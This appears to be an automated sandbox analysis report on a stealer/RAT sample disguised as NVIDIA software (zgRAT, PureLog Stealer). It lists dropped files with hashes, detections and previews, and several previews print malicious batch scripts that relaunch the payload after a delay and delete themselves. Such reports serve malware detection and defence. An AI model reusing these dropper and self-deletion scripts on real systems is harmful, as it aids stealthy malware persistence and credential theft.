Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hBoBqOIwjXsCbkOMEKwZ.exe.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
MD5:	C2E0F17D6A14A9837FE55EE183305037
SHA1:	EB56F87DAE280A52D91E88872777FDEEB2E1DF76
SHA-256:	8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
SHA-512:	F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK

C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	183
Entropy (8bit):	5.258143107090915
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1Ukh4E2J5Nn5SP6MYBktKcKZG1Ukh4E2J5xAILir8:hCRLuVFOOr+DE19231JMYKOZG1923feY
MD5:	CF6E45C52686C51C3C3C56EF7CE05498
SHA1:	A95411BD3B0F4882610353EB83B65AD5C92C3A3D
SHA-256:	5D1A60D8C83DC1D775442C5B0D7D3FEAAA4077B01E4FB2358AA073D85BDC7ACA
SHA-512:	CDB1AB17AD35BB0CFE40D7ADEA66011886ECA495187C71AE5285C998B1B3FB4F4A818CC409D22F26573CBAFB71CC0649E9639767F78F27D7E51A9B43693BD209
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1LArpmQ7xZ.bat"

C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	231
Entropy (8bit):	5.289540388586316
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE19231JMYKOZG1923fVH:HTg9uYDEiLvtH
MD5:	78A08188D1A73ADEE3FF99099F7BE09A
SHA1:	D83063AA46A571A7DFA8F8BA0CD7D83FA579CEBC
SHA-256:	2EB0D9B0FC70F42568938B3517DC071C13910DB19E60A1DAA41AA2B1186E5C10
SHA-512:	A80DD5DCE38F3332A197A66C370D5980CD23F691AF4B7DD72B3DDAB47560E319B1D346D4BAFEFC6F57B3A333734F35A36853AE17768EEDFE8F9AAC37C9D518EE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1QWUF8ga47.bat"

C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	183
Entropy (8bit):	5.275101593690698
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1Ukh4E2J5Nn5SP6MYBktKcKZG1Ukh4E2J5xAI2khn:hCRLuVFOOr+DE19231JMYKOZG1923fF
MD5:	56EB28A0460FDAF23704C0EF815B3DBD
SHA1:	CD1D919A7203A64EF91E104A18E88EE1ABEE962C
SHA-256:	04E2A5F49AD6A931FE62CFAF928FAD0B234CFF3214CF9C909510B1A969F5384B
SHA-512:	2F9D3875290860F4E9D4CC5121E58A21EA416591BD7C436F3D8E237A6E27222B784E67E7A842925CC234C379A8301F16168992E5293EF326784D270CEC540241
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\B0uJAwGmBV.bat"

C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	183
Entropy (8bit):	5.247988513921934
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1Ukh4E2J5Nn5SP6MYBktKcKZG1Ukh4E2J5xAI+wen:hCRLuVFOOr+DE19231JMYKOZG1923fTe
MD5:	5AB2AA58099FF3FB7E0EEC501DDF7BF0
SHA1:	6B0DE16DE79E590A2FCDE6DDAEA8CC1CC8267791
SHA-256:	85510FFEBB4E336377A7ACF6F5C69F95F96BD7D2FC39A095EF5146C117993D62
SHA-512:	42715618AD9ED3C6C46FFB1211E4279F989A542CFB3439ED41EE9744E776DECAD2E35E267FB1AB327D8AC027810C873615E7DBED4C11589DAC2D65CFB6BEC386
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\FuUFRpewDb.bat"

C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	231
Entropy (8bit):	5.247565868670826
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE19231JMYKOZG1923fa:HTg9uYDEiLvy
MD5:	F0678F423F3F613B70B7C68945062545
SHA1:	F6336951D61B47EE2CA799604C029227017A4967
SHA-256:	E682C28BFA3F8D5C2B4CE8435789B1778F7851789098A7B0BBD2C17D218257A0
SHA-512:	7BB04134937C04739E5E80ADC5235872B84ED6A5024F079350646BF3F34C5071FDF698CFD316E9E75445364C8587117E3128D60000D8978DC9B012A72B4EFB89
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\L4pr7KvdK9.bat"

C:\Users\user\AppData\Local\Temp\M51c8ynRzi

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688185
Encrypted:	false
SSDEEP:	3:SzgQ39:S5N
MD5:	702E0C54E725556E08238E7CCEA2A362
SHA1:	13A7813E015C1CD7FA6B74964C8176EC15B22FF1
SHA-256:	F0D73A2B5BB085C6B1050418F381558BC843ED28062952B8EAD0AB699A538D05
SHA-512:	849D878AD271E7A382BB70F2D5198414099D5DDF4EA2F51BBB47E7D99664A2BF8EAD7D338A589CF60E106F95BF05C978F637CD18E578128DB49144FDB14D7EB4
Malicious:	false
Preview:	UGlqwAlFjEafrY7XhrSRrZRUX

C:\Users\user\AppData\Local\Temp\bcDVgvLjKy

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688184
Encrypted:	false
SSDEEP:	3:8yxpRez:/xDo
MD5:	B9858B025BFD2A6EA126AA3EE04EDF8C
SHA1:	470F234909FEB302089CA649C0D1A46EF7B2BC33
SHA-256:	5202F167221FBA7D044572EF2F8124CDD2FEB708518F3391A15F099495EB50BF
SHA-512:	8C83381D9A682518F3BFBF55202363EEB5DF5D5661AA1A2404903C79C0259194A82AFC68256B4F033A94C7B349C08C09770C84E7036530678AA2B79EA75B9765
Malicious:	false
Preview:	WoYZj58tnYhesK8pPWufFGY36

C:\Users\user\AppData\Local\Temp\c1OxIfqEM4

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774724
Encrypted:	false
SSDEEP:	3:yH2OnWO9rjUOn:yWOn/n
MD5:	AE016F320F182A84D9C1694F10639DC7
SHA1:	019E7D95DC90311310023E84417ED508EF1BD32C
SHA-256:	A5A571DFF3810E3FFB10067CC0D72BFF5CEA30B1FECC256EA4E90B1479A664A3
SHA-512:	024C401A3F3A68D820F3BE85DA017677872CDEB1473FABD4ADDEB2C6446C471789C0F534702D62FB10DD3D7EEDBAFAD65765E1D4F2FCFC64682E1936E65E9E8F
Malicious:	false
Preview:	TIlbJKkzjsAODihBRNV9seTYz

C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	231
Entropy (8bit):	5.203925418466176
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE19231JMYKOZG1923fpmvK:HTg9uYDEiLvRmvK
MD5:	23D15FE140C4357007BA0347665DDD08
SHA1:	1C5D0C6E48AB71D3F242295EBC9165CE250C33C7
SHA-256:	30E1F3DC21FE1C1D0CC91FF6EE742B0E1F5BDCC318945B9AC0230E346759BA64
SHA-512:	4E4B77BFB72E608772E6CCCF428242AAFA4892AF326BF2EBCC357938598B883C08E4701981A06D824966D94BB6AEE06A102EF50C069EAEEC9EF2DCEA0D483AC8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\cMdeBf80Aw.bat"

C:\Users\user\AppData\Local\Temp\e5b1d191efd6658c81c1e31a8eff125602419669

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.6486467576016866
Encrypted:	false
SSDEEP:	3:XttktgkwVUTcVUWgdfhLJFTLvZy6vOjj8KMz3AeAhQgfXvuPkHBhCZHqnv:dlmTc2dpzrvfKMbAe0fXGPkHBhC+
MD5:	203B8AAFE22D5A12D150DEB3945FBDFC
SHA1:	BBB8BA37F035C460FFFA56F99C2D9F34E5C9FBF3
SHA-256:	5C2787A5DE709B79232B7391A462C79F88365AF311E8119C3E59D9C339B1085B
SHA-512:	22B6423AC9EC50E2BDA18CA50213F419E4711CFCA72EE6406E90781B8B9E6F7D5FB0DD52F7344063A9DD54A72916272B07B0FB282BB762667205F638B9407749
Malicious:	false
Preview:	H4sIAAAAAAAEAItWcraKiQktTi0qjolJzEnLzwPSjgUFLokliTExPvnJiTkxMRlO+U6F/p7lWRHFzknZ/r6u3uVReqkVqUo6eHUH5SfmZualx8T4hXm6eDrCaAXn/LySxMy81CKwGbEAjbOBQYMAAAA=

C:\Users\user\AppData\Local\Temp\iL9Gg9nsKM

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:BVrPlmwLX:DPpX
MD5:	DA583BFCB0C1DA3282C196B240D86218
SHA1:	3B2CAE18464A9CCFBD49B391A3A068AFE64B630C
SHA-256:	014536B381E524DF14C031147E1863666996F0063614F2A904ADFBEB639A51D9
SHA-512:	C8C7F52119E14AB686863147C731D50C6D68579DE20DC2750A141808BEE26F925CE1FBD927093084AF3F2CF7969C2AF3110C9942202FFF3F2759845E968841D4
Malicious:	false
Preview:	NiImkpJ6OuMwzFtCAG1b6ZFzr

C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	231
Entropy (8bit):	5.200945218408088
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE19231JMYKOZG1923f7qG:HTg9uYDEiLv9
MD5:	1D7931E4BFD70CE3460A612F6E3210B2
SHA1:	753EDC0FD40D15E03A1DBC9F4055EEBA4848AFED
SHA-256:	2E4E57DBE3A7D89E84012EC3C2DE2142974285078EF4931625C0663851DFE555
SHA-512:	668E5DF62C17E64DC29EAF9CF4CE249FE78798975C855FDDF74061EC3C8636FCB7E75861593D20BC0A9E2F18ED54962B25F972F53462A86C08E15B13E45EE9F7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ij3ogloIkp.bat"

C:\Users\user\AppData\Local\Temp\mO6P2jKSFx

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.4838561897747224
Encrypted:	false
SSDEEP:	3:LGkRAHSVzo5R:LbRimzcR
MD5:	1E3A7A83A748EC835D6A1D0254A68C0B
SHA1:	2E2D983C491ADCA4D686CE04A89F72CFD9906EB0
SHA-256:	42538FACE4749A5BADE71A69EDCE664AB2FD157092978E1C8903D865EB624073
SHA-512:	9BA4926AB16937B0968E61D74C365FFBE49FD89419D3529BA2970BEE28190C0A1A91B7C985822CFC11006E4971CC70258BAA57711B4B0BF73766965D99F0512C
Malicious:	false
Preview:	aClh5v17WoCtrSRb70VM8g9eQ

C:\Users\user\AppData\Local\Temp\mOp9SPZlVJ

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774723
Encrypted:	false
SSDEEP:	3:SZkTQ+D3Tn:zb
MD5:	0EDDA566B1B1B42FE48CC6F62C0C0003
SHA1:	95F1029C09760EA3B2F2E6559281415604C45BFA
SHA-256:	1A90847376483C586F1229DB6F50D10A188F247375C7A9D6D5A30FFF41EF069C
SHA-512:	8323E016F4FE8662AF9BDCBF5D3B573B142E9498C9E39DC72A48187E8F35A5A13F09449E00B3942DA7DBE16D55F147F3A28462CF95C2A4775F8B6A2FDC072965
Malicious:	false
Preview:	HOdrN6fEmA8Uddeud5B1m3aRv

C:\Users\user\AppData\Local\Temp\qtONc3XZ0o

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:6+UnjhjjZ:6+UdjjZ
MD5:	0070C8A0362C346B52E918E3AF285E00
SHA1:	91522CD85834EC171DDF0C0C6B19E576AE169BD5
SHA-256:	461AE4E313BC1FD4360E5876DBE482C830583339AC33AE47845493D8AB108A85
SHA-512:	14EE352A4F7E9D10CA0BB3E635B938CFB7EB21A9E1193A842DF2E909FEB3C2E3BC178D8F8CA542E5D94035B1811AE29D9EA66458C941547EFC31B682EB81A632
Malicious:	false
Preview:	dJayXIi1hO9dpDFFUAOQpGBTy

C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	231
Entropy (8bit):	5.196768058769674
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE19231JMYKOZG1923fhgJ:HTg9uYDEiLvOJ
MD5:	A904362A2FFB9052FEBCD0203B690607
SHA1:	3B5D16A1640397428D0E5B967FD0E8D28606A8DF
SHA-256:	EF67C22F26BFC4BB4782D57AEB9C8FED3E4AC5293ABDE9B92A784CDAD633E2DF
SHA-512:	2C0CD2BC3E944476762B2D090E33BF65BC958DF74C0DF68E53BDD767E35C745B340FCAF450429A8D4BBBA8A38854C82B5A7FA535E53865A2E8E535C2282A9435
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\s4Al4mMfKa.bat"

C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	183
Entropy (8bit):	5.236907318574728
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1Ukh4E2J5Nn5SP6MYBktKcKZG1Ukh4E2J5xAILHKG:hCRLuVFOOr+DE19231JMYKOZG1923fLx
MD5:	E4B6FA49CF972DC90BD8DFDC493BF985
SHA1:	426B585C4AD92FA611F1024BAD2D0BED2A558803
SHA-256:	4FFDB9A2A2C741AC2D34ABB9B073B67BBEBF0B02FB8FF58A88B23A8044400879
SHA-512:	B21C0B914736BE2BE14039EB77AB6D7290B88EDBD56D799BE85EDFF3F45AF26B8CFA3D5CCB67E1D9FEA81832CAA3C4729E9B67E620DD8D7D21F8B13C18BE5D17
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\sxRqhXCXyo.bat"

C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	231
Entropy (8bit):	5.27952566668794
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE19231JMYKOZG1923fLKq:HTg9uYDEiLvjKq
MD5:	1139BA871D102BF5F872DD1D4F38750B
SHA1:	CA0074E893A48FAAFE05AFA3172FD25083644723
SHA-256:	0DD6BF8795EDC35CC9F67291DD8C67C424A5C3443313F86DE2B28CC057FF48A6
SHA-512:	A0A60F52A0354281F05A3502D8B458A91CA49B6BC74102F1F742E43AB399EDF001C68BE4442F599C959F526AE3FD7D92A311F98351451F148BFE107530AB0371
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\vPPPhWVNfR.bat"

C:\Users\user\AppData\Local\Temp\vvuJKZwWap

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774724
Encrypted:	false
SSDEEP:	3:sRLzmrKLIntn:stzm+Lq
MD5:	9310B8A9FADB1D759809D1E97B3068CB
SHA1:	8A0D8347F69785BD12F080F6784E1E3D893D1AEF
SHA-256:	611ACC57A02128AA230671E0F31D69FA1CB6D1062933A6BEFE4761F36B1AA980
SHA-512:	54D61FDBE6A6E573BD08EA8064647ED2B7C89B2F323C0A43228418C1A1663338247BA7FB25DA6E922A3FB52A30B1852B36782D12BD131630B9E52D737F3D79DD
Malicious:	false
Preview:	y84nBVfSxEam1ReItwcymBgcr

C:\Users\user\AppData\Local\Temp\wVHe5nIND9

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.5638561897747225
Encrypted:	false
SSDEEP:	3:uWQ18RR1o:uWQARS
MD5:	18192D13C309A2670A3182A265A51E3A
SHA1:	79BCDC3C4F54B8A7D1DC2CB0A874941EEBAEC67B
SHA-256:	4DCCA76400E7F1C3CFB0A82624A56FF5D1A6510B448E0A512CCF1756772B5E6F
SHA-512:	3A3C1E65328C47A0ABDB0F26C1B7B4412893435AEA304E99DFB1A921507244CC3C01A59EADF2F09BD03636A58270D2B90A074FD1BF3C29EB7BDB503BDF908370
Malicious:	false
Preview:	9zsgvPHmApkE14xZH8lK3cLaI

C:\Users\user\AppData\Local\Temp\zgDHWkV3z6

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:xuJYpAn:xup
MD5:	2D1C2593805BE88A21141A67E0FF58F1
SHA1:	31DDFA8C64DA0CE8A36C937DF0D4844B872E5839
SHA-256:	AF3B92636460D33F10E062621AC8125FFA829B7DBB4B02DD9D6C270B795FB837
SHA-512:	58C67A78322BB44F5259F424DAE29AF79CC6DB9E274BE5336F251FF4B2206ECCD8D6E2283F5F88EEBBEC58A42C27F8E4EC015042038D6B2167FF8E0E49673927
Malicious:	false
Preview:	wJeNdb9tJIDX54Mns7SXGSCa6

C:\Users\user\AppData\Local\a84f4ec476ba0a

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	ASCII text, with very long lines (382), with no line terminators
Category:	dropped
Size (bytes):	382
Entropy (8bit):	5.825482493189938
Encrypted:	false
SSDEEP:	6:iOg1dTqa306R+gBmekzQ0UINdYyhKOEqRkXUOWdYP5yPzTTH2y9Xa3TgoJFrW74n:asa3VRBBmv81INaqR856HCTtJN9n
MD5:	0C25AAF326F7A6944FDB31A48CDD6918
SHA1:	FF0A3D077B5B0D949B9AE1FB6908678259D48958
SHA-256:	6C54C8A8369FD732D78FB60D0FBF088495D6D6CBECBA6826D1C101A422B819DB
SHA-512:	03E1ED6BF5A3CD757E590CF699E971F4EB84413F1257673EAE9C3BC2BEA34D4E23BA578CBC68E19526A863F999B560E96F982444992C1FBC80AED1B5A88A4AC2
Malicious:	false
Preview:	rKxS4NInpJOzWiEaLMMMEa8pJ6JJuJEj7wtOcRLEbieogrRRF6Xlr3SQLHJ7D83fEp1kzz83BIug6UJbp2Exvd1EdcCVHNAdp8j1zrcP8dkjJwU17rSL4FulxxGXxmvxHQ07uSm8ayzR2S5qHLYa5yjkO7DCkEcVrwb26WGoFUvFPcte2ZPlOV2TrQtxOkXVWejG1CuvEtVkDeUvOjKLz0GW3ILpmTZf7asu2nnzodhfARPN68ipaLffYNMs1FIvT0nmvj2l6UgVTkVm27touuEv4MWpa48iVvLKonbWF7tFoJMx1k03WdBjv2riNMKBV7AhYL7PfWiwA9GuAix0EEM1umZv53I3xsuqJoYqmlX95Oiwv6ioZT7QvIxwwL

C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1937408
Entropy (8bit):	7.542448246853066
Encrypted:	false
SSDEEP:	49152:Uul0wFSe3LBPCLPN7KNt6joVQj8Axv02AcY7e:Ui07e7BPClKNt6joVQj3R+e
MD5:	833E95D4CE4E4A4AD42322F75AE6FF57
SHA1:	C212B00EA68564CA96AD90BFBB32BC869BE6860F
SHA-256:	2C7C5C61FC1E5BDACFF2B81F8FDA8514924F1820FD090F35D7506C3778173C9E
SHA-512:	BAF397A9EEDCAFBDB74777EEDAF637785C020B2EB99C20254A27E44EAD1DDE18B787C78906F3473D5347C7B0C83BB7B41CF0DBBE3C9CDE2CBBC9A6FC7267E766
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................................@.................................`...K.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@....reloc..............................@..B........................H..................g..................................................0..........(.... ........8........E....q.......)...M...8l...(.... ....~....{....:....& ....8....(.... ....~....{o...:....& ....8....(.... ....~....{....:....& ....8z......0.......... ........8........E........h...%.......J...Y.......8....~....9.... ....8....r...ps....z...... ....~....{....:....& ....8....8.... ....8....8.... ....8w...~....([... .... .... ....s....~....(_....... ....~....{d...:7...& ...

C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe

Download File

Process:	C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1937408
Entropy (8bit):	7.542448246853066
Encrypted:	false
SSDEEP:	49152:Uul0wFSe3LBPCLPN7KNt6joVQj8Axv02AcY7e:Ui07e7BPClKNt6joVQj3R+e
MD5:	833E95D4CE4E4A4AD42322F75AE6FF57
SHA1:	C212B00EA68564CA96AD90BFBB32BC869BE6860F
SHA-256:	2C7C5C61FC1E5BDACFF2B81F8FDA8514924F1820FD090F35D7506C3778173C9E
SHA-512:	BAF397A9EEDCAFBDB74777EEDAF637785C020B2EB99C20254A27E44EAD1DDE18B787C78906F3473D5347C7B0C83BB7B41CF0DBBE3C9CDE2CBBC9A6FC7267E766
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
